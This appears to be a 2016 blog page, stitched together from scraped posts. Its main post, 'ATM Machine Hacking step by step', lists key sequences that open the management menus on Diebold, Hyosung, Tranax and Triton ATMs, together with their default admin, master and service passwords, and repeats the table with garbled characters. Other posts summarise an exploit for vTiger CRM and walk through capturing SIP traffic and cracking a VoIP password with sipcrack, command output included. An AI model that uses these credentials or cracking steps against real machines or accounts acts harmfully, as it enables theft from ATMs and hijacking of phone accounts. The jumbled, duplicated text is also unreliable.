Saturday, July 16, 2016
ATM Machine Hacking
step by step
Diebold CSP 200 "1. With the terminal in the in-service mode, press the terminal maintenance switch. The Out of Service Password screen displays.
2. Enter the password (the default password is 626243). An asterisk appears on the screen for each character entered.
3. Once the password is entered, Select ENTER or press the Enter key on the numeric keypad. The Manage Passwords screen displays." 626243
Hyosung NH5050 "1. Press the ENTER, CLEAR, and CANCEL keys at the same time; then enter 1, 2, 3 in order.
2. Enter your password and press ENTER."
Hyosung MB1500 "Press the
CANCEL, CLEAR, ENTER key simultaneously
and then press 1, 2, 3 keys in order." "Operator Password is “159951â€..
Master Password is “375876â€..
Service Password is “965733â€."
Hyosung MB1800 "Press the
CANCEL, CLEAR, ENTER key simultaneously
and then press 1, 2, 3 keys in order." "Operator Password is “111111â€..
Master Password is “555555â€..
Service Password is “222222â€." "The
factory default RMS Password is “111111â€."
Hyosung MB2100T "1) Change to supervisor mode by pressing
highlighted switch. (upper right corner)" "Operator Password is “222222â€.
Master Password is “555555â€.
Service Password is “111111â€." "The
factory default RMS Password is “333333â€."
Hyosung NH-1800CE To enter Supervisor mode press the ENTER, CLEAR, CANCEL, 1, 2 and 3 keys in order. "OPERATOR
111111 (6 digits)
SERVICE
222222 (6 digits)
MASTER
555555 (6 digits)"
Mandrake ecash2000 Press the CANCEL, CLEAR, ENTER key simultaneously and then press 1,2,3 keys in order. 159951
NCR 7401 terminal reboot password (in manual example)
Tranax 1700 To access the Operator Function menu, press the following keys in order , then , then then 1, then 2, then 3. 000000 000000
Tranax 1500 "To access the Operator Function menu, hold the , and
keys simultaneously for 2 seconds, release them and press 1, then press 2, then
press 3. The timing of this procedure can be difficult at first." 555555 222222
Triton 98xx "1. Press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu will be displayed.
2. At the Top Menu select the management area by pressing the F7 Screen Key (next to the MANAGEMENT FUNCTIONS option)." 001234 00
Triton 9100 "1. At the Customer Welcome screen, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top menu screen will be displayed.
2. The Top menu allows you to choose one of two options, CUSTOMER TRANSACTIONS or MANAGEMENT FUNCTIONS. Select MANAGEMENT FUNCTIONS. The password entry screen appears.
3. Enter the Master or Administrative password and press the key. The MANAGEMENT FUNCTIONS main menu screen appears." 123456 987654
Triton RL5000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton 8100 "1. Press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the top menu will be displayed.
2. At the top menu, select MANAGEMENT FUNCTIONS by pressing the key next to Management Functions option.
3. Enter the user password at the password entry display." 123456 987654
Triton 97xx "1. If the Customer Welcome screen is being displayed, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu screen will be displayed. Select the MANAGEMENT FUNCTIONS option.
2. Reset the terminal by removing and reapplying power to the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS.
3. Remove and then reapply power to the terminal using the ON/ OFF switch located on the right side of the card cage inside the upper enclosure of the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS." 123456 987654
Triton RT2000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton FT5000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton 2000 "1. If the Customer Welcome screen is being displayed, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu screen will be displayed. Select the MANAGEMENT FUNCTIONS option.
2. Reset the terminal by removing and reapplying power to the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS.
3. Remove and then reapply power to the terminal using the ON/ OFF switch located on the right side of the card cage inside the upper enclosure of the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS." 123456 987654
Triton 9600 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 123456 987654
Triton RL1600 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 123456 987654
Triton RL2000 "1. Activate the terminal (terminal reboot) to perform customer transactions by pressing the key next to CUSTOMER
TRANSACTIONS.
2. Enter the terminal system management area by pressing the key next to MANAGEMENT FUNCTIONS.
Note: You will have to enter an appropriate password to view the Management Functions menu." The Master password must be changed from its default.
http://lifewaylearner.blogspot.pt/2014/09/atm-hacking-step-by-step.html
Company Model ACCESSING THE MANAGEMENT FUNCTIONS MENU Master Password ID Code
Admin Password
Diebold CSP 200 "1. With the terminal in the in-service mode, press the terminal maintenance switch. The Out of Service Password screen displays.
2. Enter the password (the default password is 626243). An asterisk appears on the screen for each character entered.
3. Once the password is entered, Select ENTER or press the Enter key on the numeric keypad. The Manage Passwords screen displays." 626243
Hyosung NH5050 "1. Press the ENTER, CLEAR, and CANCEL keys at the same time; then enter 1, 2, 3 in order.
2. Enter your password and press ENTER."
Hyosung MB1500 "Press the
CANCEL, CLEAR, ENTER key simultaneously
and then press 1, 2, 3 keys in order." "Operator Password is “159951â€..
Master Password is “375876â€..
Hyosung MB1800 "Press the
CANCEL, CLEAR, ENTER key simultaneously
and then press 1, 2, 3 keys in order." "Operator Password is “111111â€..
Master Password is “555555â€..
Service Password is “222222â€." "The
factory default RMS Password is “111111â€."
Hyosung MB2100T "1) Change to supervisor mode by pressing
highlighted switch. (upper right corner)" "Operator Password is “222222â€.
Master Password is “555555â€.
Service Password is “111111â€." "The
factory default RMS Password is “333333â€."
Hyosung NH-1800CE To enter Supervisor mode press the ENTER, CLEAR, CANCEL, 1, 2 and 3 keys in order. "OPERATOR
111111 (6 digits)
SERVICE
222222 (6 digits)
MASTER
555555 (6 digits)"
Mandrake ecash2000 Press the CANCEL, CLEAR, ENTER key simultaneously and then press 1,2,3 keys in order. 159951
NCR 7401 terminal reboot password (in manual example)
Tranax 1700 To access the Operator Function menu, press the following keys in order , then , then then 1, then 2, then 3. 000000 000000
Tranax 1500 "To access the Operator Function menu, hold the , and
keys simultaneously for 2 seconds, release them and press 1, then press 2, then
press 3. The timing of this procedure can be difficult at first." 555555 222222
Triton 98xx "1. Press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu will be displayed.
2. At the Top Menu select the management area by pressing the F7 Screen Key (next to the MANAGEMENT FUNCTIONS option)." 001234 00
Triton 9100 "1. At the Customer Welcome screen, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top menu screen will be displayed.
2. The Top menu allows you to choose one of two options, CUSTOMER TRANSACTIONS or MANAGEMENT FUNCTIONS. Select MANAGEMENT FUNCTIONS. The password entry screen appears.
3. Enter the Master or Administrative password and press the key. The MANAGEMENT FUNCTIONS main menu screen appears." 123456 987654
Triton RL5000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton 8100 "1. Press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the top menu will be displayed.
2. At the top menu, select MANAGEMENT FUNCTIONS by pressing the key next to Management Functions option.
3. Enter the user password at the password entry display." 123456 987654
Triton 97xx "1. If the Customer Welcome screen is being displayed, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu screen will be displayed. Select the MANAGEMENT FUNCTIONS option.
2. Reset the terminal by removing and reapplying power to the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS.
3. Remove and then reapply power to the terminal using the ON/ OFF switch located on the right side of the card cage inside the upper enclosure of the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS." 123456 987654
Triton RT2000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton FT5000 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 001234 00
Triton 2000 "1. If the Customer Welcome screen is being displayed, press and hold down the key; while holding down the key, press the <1> key. Release both keys. After a moment the Top Menu screen will be displayed. Select the MANAGEMENT FUNCTIONS option.
2. Reset the terminal by removing and reapplying power to the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS.
3. Remove and then reapply power to the terminal using the ON/ OFF switch located on the right side of the card cage inside the upper enclosure of the terminal. When the Top Menu is displayed select MANAGEMENT FUNCTIONS." 123456 987654
Triton 9600 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 123456 987654
Triton RL1600 "1. At the Customer screen , press and hold down the key; while holding down the key, press the <1> key. Release both keys. The password entry prompt appears.
2. At the password entry screen, enter the Master or Users password." 123456 987654
Triton RL2000 "1. Activate the terminal (terminal reboot) to perform customer transactions by pressing the key next to CUSTOMER
TRANSACTIONS.
2. Enter the terminal system management area by pressing the key next to MANAGEMENT FUNCTIONS.
Note: You will have to enter an appropriate password to view the Management Functions menu." The Master password must be changed from its default.
http://lifewaylearner.blogspot.pt/2014/09/atm-hacking-step-by-step.html
ATM Default Passwords
It’s been almost two years since I harped on this stuff. Found
out I’m getting visits to the old post still, so I figured it’s time for
a quick update. Did a little looking around on Google and the results
turned up the following:
Here’s some manuals I found at http://attrition.org/misc/ee/atm_manuals/:
07103-00013C (FT5KUsrMan(3.0))file Tranax Mb Operator Manual MakoOps(4.1) 07102-00047 (RT2KUsrMan) 98XXman(2.5) 07100-00008F (9100UsrMan(5.0)) 07100-00018B (RL5KUsrMan(2.0)) 07100-00055 (8100 manual) 07102-00042B (97XXOpsMan(2.0))
And a fun cheat sheet for other default passwords that have been made available on the Internet.
Here’s some manuals I found at http://attrition.org/misc/ee/atm_manuals/:
07103-00013C (FT5KUsrMan(3.0))file Tranax Mb Operator Manual MakoOps(4.1) 07102-00047 (RT2KUsrMan) 98XXman(2.5) 07100-00008F (9100UsrMan(5.0)) 07100-00018B (RL5KUsrMan(2.0)) 07100-00055 (8100 manual) 07102-00042B (97XXOpsMan(2.0))
And a fun cheat sheet for other default passwords that have been made available on the Internet.
| Company | Model | ACCESSING THE MANAGEMENT FUNCTIONS MENU | Master Password | ID Code | Admin Password | ||
| Diebold | CSP 200 | 1. With the terminal in the in-service mode, press the terminal maintenance switch. The Out of Service Password screen displays.2. Enter the password (the default password is 626243). An asterisk appears on the screen for each character entered. 3. Once the password is entered, Select ENTER or press the Enter key on the numeric keypad. The Manage Passwords screen displays. | 626243 | ||||
| Hyosung | NH5050 | 1. Press the ENTER, CLEAR, and CANCEL keys at the same time; then enter 1, 2, 3 in order.2. Enter your password and press ENTER. | |||||
| Hyosung | MB1500 | Press theCANCEL, CLEAR, ENTER key simultaneously and then press 1, 2, 3 keys in order. | Operator Password is “159951”..Master Password is “375876”.. Service Password is “965733”. | ||||
| Hyosung | MB1800 | Press theCANCEL, CLEAR, ENTER key simultaneously and then press 1, 2, 3 keys in order. | Operator Password is “111111”..Master Password is “555555”.. Service Password is “222222”. | Thefactory default RMS Password is “111111”. | |||
| Hyosung | MB2100T | 1) Change to supervisor mode by pressinghighlighted switch. (upper right corner) | Operator Password is “222222”.Master Password is “555555”. Service Password is “111111”. | Thefactory default RMS Password is “333333”. | |||
| Hyosung | NH-1800CE | To enter Supervisor mode press the ENTER, CLEAR, CANCEL, 1, 2 and 3 keys in order. | OPERATOR111111 (6 digits)
SERVICE 222222 (6 digits) MASTER 555555 (6 digits) |
||||
| Mandrake | ecash2000 | Press the CANCEL, CLEAR, ENTER key simultaneously and then press 1,2,3 keys in order. | 159951 | ||||
| NCR | 7401 | terminal reboot | password (in manual example) | ||||
| Tranax | 1700 | To access the Operator Function menu, press the
following keys in order |
000000 | 000000 | |||
| Tranax | 1500 | To access the Operator Function menu, hold the
|
555555 | 222222 | |||
| Triton | 98xx | 1. Press and hold down the |
001234 | 00 | |||
| Triton | 9100 | 1. At the Customer Welcome screen, press and hold
down the |
123456 | 987654 | |||
| Triton | RL5000 | 1. At the Customer screen , press and hold down the
|
001234 | 00 | |||
| Triton | 8100 | 1. Press and hold down the |
123456 | 987654 | |||
| Triton | 97xx | 1. If the Customer Welcome screen is being
displayed, press and hold down the |
123456 | 987654 | |||
| Triton | RT2000 | 1. At the Customer screen , press and hold down the
|
001234 | 00 | |||
| Triton | FT5000 | 1. At the Customer screen , press and hold down the
|
001234 | 00 | |||
| Triton | 2000 | 1. If the Customer Welcome screen is being
displayed, press and hold down the |
123456 | 987654 | |||
| Triton | 9600 | 1. At the Customer screen , press and hold down the
|
123456 | 987654 | |||
| Triton | RL1600 | 1. At the Customer screen , press and hold down the
|
123456 | 987654 | |||
| Triton | RL2000 | 1. Activate the terminal (terminal reboot) to perform customer transactions by pressing the key next to CUSTOMERTRANSACTIONS.
2. Enter the terminal system management area by pressing the key next to MANAGEMENT FUNCTIONS. Note: You will have to enter an appropriate password to view the Management Functions menu. LINK: http://techbytom.com/more-atm-default-passwords/ |
The Master password must be changed from its defau | ||||
Friday, July 15, 2016
One alternative I found was to retransmit the HTLM back to host, not a common TCP retransmission, is by dumping fsdb file on wavelenght...which means the plugin will search the class of waveform on the address
...The problem is that source files and fsdb can be imported but can not
put any signal on nWave. When drag and put one signal on nWave, a
wanning window addresses that it is unrecognized signal
... Solve it by checking Novas document.
Need to add option +cli+3 -line for compilation such as:
vcs +cli+3 -line -f run.f....
.... I want seek a software to see .fsdb file on windows ....Debussy/Verdi by Novas Systems....or use cscope of synopsys..or Turbo Wave
LINK
http://www.edaboard.com/thread131488.html
We will describe in particular how to extend
LINK
http://aiida-core.readthedocs.io/en/latest/developer_guide/data_cmdline.html
... Solve it by checking Novas document.
Need to add option +cli+3 -line for compilation such as:
vcs +cli+3 -line -f run.f....
.... I want seek a software to see .fsdb file on windows ....Debussy/Verdi by Novas Systems....or use cscope of synopsys..or Turbo Wave
LINK
http://www.edaboard.com/thread131488.html
Verdi command line plugins
AiiDA can be extended by adding custom means of use to interact with it via the command line, by extending the ‘verdi’ commands.We will describe in particular how to extend
verdi data by adding a
new subcommand.LINK
http://aiida-core.readthedocs.io/en/latest/developer_guide/data_cmdline.html
Zulu, a virus writer from South America, appears to have discovered that Adobe PDF files can be used to carry computer viruses
....
(are you sure you want to create a document measuring 1x1 pt?)
The next issue with the first variant is a bug in Acrobat, which discards "floating" Icon Objects when saving the document; you'd have to attach the Icon Object to a field to keep it; this field can be hidden, or even on a hidden Template page in the document.
LINK
http://stackoverflow.com/questions/25323427/import-image-in-acrobat-using-javascript-preferred-on-document-level
However with Zulu's trick, a malicious
VBScript file can instead be hidden inside a PDF file which Outlook
considers safe.
LINK
http://lwn.net/2001/0809/a/adobe-pdf-vul.php3
vTiger CRM allows an user to bypass authentication when requesting SOAP services.
In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
service. By combining both vulnerabilities an attacker can upload and execute PHP
code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
10.04 and Windows 2003 SP2.
LINK
https://www.rapid7.com/db/modules/exploit/multi/http/vtiger_soap_upload
THEREFORE
The next issue with the first variant is a bug in Acrobat, which discards "floating" Icon Objects when saving the document; you'd have to attach the Icon Object to a field to keep it; this field can be hidden, or even on a hidden Template page in the document.
LINK
http://stackoverflow.com/questions/25323427/import-image-in-acrobat-using-javascript-preferred-on-document-level
Monday, July 11, 2016
Saturday, July 9, 2016
Android - Enable Wi-Fi tethering without SIM card or internet connection
I am currently developing an APP to create a communication field
between two devices over Wi-Fi tethering and TCP protocols. The first
one is an Android device(server) that do not have a SIM card and it is
not interesting to the customer. The second one (client) only supports
Wi-fi tethering connectivity and needs to connect to an access point or a
portable wifi hotspot.
To activate the Portable Wifi hotspot on the Android phone I need to have a SIM Card. However I found an app called FoxFi that allows the phone enable it without SIM Card, but I still need to have some internet connectivity to able to do it (Eg. any wifi connected to a router). The problem is: in the field the customer will not have any internet connect and to get a SIM card is not a option.
Does anyone know how could I force the activation of the Wifi tethering without SIM card and any internet connectivity?
To activate the Portable Wifi hotspot on the Android phone I need to have a SIM Card. However I found an app called FoxFi that allows the phone enable it without SIM Card, but I still need to have some internet connectivity to able to do it (Eg. any wifi connected to a router). The problem is: in the field the customer will not have any internet connect and to get a SIM card is not a option.
Does anyone know how could I force the activation of the Wifi tethering without SIM card and any internet connectivity?
|
I believe Hotspot Control
does this. Worked for me on Android 4.0.4 on Samsung Galaxy Note
(SGH-I1717). It says rooting is usually not required, and it was not
required for me either.
http://stackoverflow.com/questions/14608833/android-enable-wi-fi-tethering-without-sim-card-or-internet-connection |
Crack-VoIP
What is VoIP
$ tshark -r sip.pcap -z io,phs
Protocol Hierarchy Statistics
Filter:
eth frames:1142 bytes:268123
ip frames:1140 bytes:267872
udp frames:1140 bytes:267872
data frames:72 bytes:5300
sip frames:11 bytes:7730
rtcp frames:5 bytes:1142
rtcp frames:5 bytes:1142
rtcp.length_check frames:5 bytes:1142
rtp frames:1052 bytes:253700
ipv6 frames:2 bytes:251
tcp frames:2 bytes:251
ssl frames:1 bytes:165
Environment
Description
In this tutorial, we will show the weaknesses of a SIP traffic without a proper encryption, how to capture SIP traffic, how to isolate the login, how to crack the password, and protection mechanisms.Environment
The tests have been performed in a very simplified home architecture as follows: __________ ________ __________
/ INTERNET \_______| ADSL | wifi | X-Lite |
\__________/ | box | ))) ((( | |
+------+ +--------+
Tools used
- Telephony
- client OS: Mac OS X Lion
- SIP client: X-Lite4 (v4.1)
- Crack
- SIPcrack containing sipcrack and sipdump
Example
Capturing the traffic
Let's capture the traffic using tcpdump:$ tcpdump -s0 -w sip.pcap tcp or udp
Isolating the login
sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file.$ cd ~/src/SIPcrack-0.3pre/
$ ./sipdump -p ~/tmp/sip.pcap logins.dump
SIPdump 0.3pre ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file '../../tmp/sip.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp'
* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158')
* Exiting, sniffed 1 logins
$ cat logins.dump
192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062
"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383
As you can see from the string above, the login appears in clear, and the password as a MD5 hash.
Notice that we could also have used tshark to obtain the same result:
$ tshark -r sip.pcap -Tfields -e sip.auth | grep username
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\",
response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5,
opaque=\"04cc3f555880bdf\"\x0d\x0a
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\",
response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5,
opaque=\"04cd38e646e760\"\x0d\x0a
Cracking the password
sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password.$ car ~/exploits/dictionaries/test.txt
azerty
elephant
test
password
admin
password01
Password01
507ZEy@l
oops
oopsoops
cat
dog7
monster
$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump
SIPcrack 0.3pre ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num Server Client User Hash|Password
1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Loaded wordlist: '~/exploits/dictionaries/test.txt'
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Tried 10 passwords in 0 seconds
* Found password: '507ZEy@l'
* Updating dump file 'logins.dump'... done
https://www.aldeid.com/wiki/Crack-VoIP
Subscribe to:
Posts (Atom)
